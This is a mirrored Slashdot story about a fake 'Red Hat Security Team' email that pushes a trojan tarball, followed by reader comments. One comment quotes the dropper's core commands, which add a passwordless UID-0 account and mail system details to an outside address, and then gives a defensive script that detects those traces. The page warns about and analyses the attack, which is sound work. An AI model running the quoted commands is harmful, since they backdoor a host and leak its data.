Slashdot Mirror


Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

6 of 628 comments

  1. Re:Cry havoc! by sfire · · Score: 1, Redundant

    And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?

  2. Re:Use the /. effect for good by sfire · · Score: 0, Redundant

    And how much you want to bet that the server was hacked, and the real owner of the server is going to have to foot the bill?

  3. Here's my analysis by andfarm · · Score: 1, Redundant

    What a coincidence - I just analysed the same thing, having seen it through Full-Disclosure. Here's the critical section:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    In other words, it'll create a root-equivalent user called 'bash' and mail some system info to root@addlebrain.com.

    --

    TANSTAAFI: There Ain't No Such Thing As A Free iPod.
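    A check for the two traces that script leaves behind (a second UID-0 account and an account whose password was cleared with passwd -d), added here as an example and not part of the original post. It reads passwd- and shadow-format files, so it can be pointed at copies pulled from a suspect host; the sample files below are constructed to mimic the post-infection state.

```shell
#!/bin/sh
# Added example, not from the original thread: look for the artefacts the
# quoted dropper creates. Works on passwd/shadow-format files given as
# arguments, so copies from a suspect machine can be inspected elsewhere.

# Print every account whose UID is 0 but whose name is not "root"
# (the dropper does: adduser -g 0 -u 0 -o bash).
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print every account whose shadow password field is empty, i.e. login with
# no password at all (the dropper does: passwd -d bash).
find_empty_password() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Constructed sample files mimicking the state after the dropper ran.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
EOF

cat > "$SAMPLE_DIR/shadow" <<'EOF'
root:$1$constructedhash$:12345:0:99999:7:::
daemon:*:12345:0:99999:7:::
alice:$1$constructedhash$:12345:0:99999:7:::
bash::12345:0:99999:7:::
EOF

echo "accounts with UID 0 other than root:"
find_extra_uid0 "$SAMPLE_DIR/passwd"
echo "accounts with an empty password field:"
find_empty_password "$SAMPLE_DIR/shadow"
```

    On a real host, run the two functions against /etc/passwd and /etc/shadow (as root) or against copies taken off the machine; a locked account shows "*" or "!" in the shadow field, so only a truly empty field is reported.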

  4. look at this in a different way by barebones · · Score: 0, Redundant

    LINUX IS GROWING LINUX IS GROWING, but is this just the start of Linux bugs or viruses etcccc.......

  5. The Obvious tip-off? by dramatools · · Score: 0, Redundant

    Shouldn't users suspect a "patch" from Red Hat (who gave the world RPM) distributed as a tarball? Also, a real Red Hat alert would encourage users to download the update from RHN or a known good Yum repository. If those two holes in the story weren't enough, there's the lack of a case number and the single patch offered for SIX distributions, all of which are end-of-life save for Fedora Core 2. Red Hat now only provides official updates for Red Hat Enterprise Linux, which isn't mentioned in the "alert" at all. The Fedora Project would only provide updates for Fedora Core 2, while RHL 7.3, 9 and FC 1 are now supported by the Fedora Legacy Project. RHL 7.2 and 8.0 are pretty much abandoned, so any fixes for those releases would need to be built by the user. Fedora Core doesn't even ship a 'fileutils' package; the Fedora version is called 'coreutils' and also includes sh-utils, textutils and the 'stat' command. This kind of phishing scam is unfortunately commonplace, though large financial institutions are the usual covers. This is the first one I've seen pertaining to a Linux distro; I can only hope most Red Hat/Fedora admins are familiar enough with their distros to see right through this one.

  6. Re:We knew this day would come by Erik Hollensbe · · Score: 0, Redundant

    Not to mention, I can't think of a rootkit that doesn't hack ps.

    Standard fare for me is to keep a statically compiled ps and lsof available to me off-machine in case anything 'weird' happens. It doesn't solve all problems, but it helps.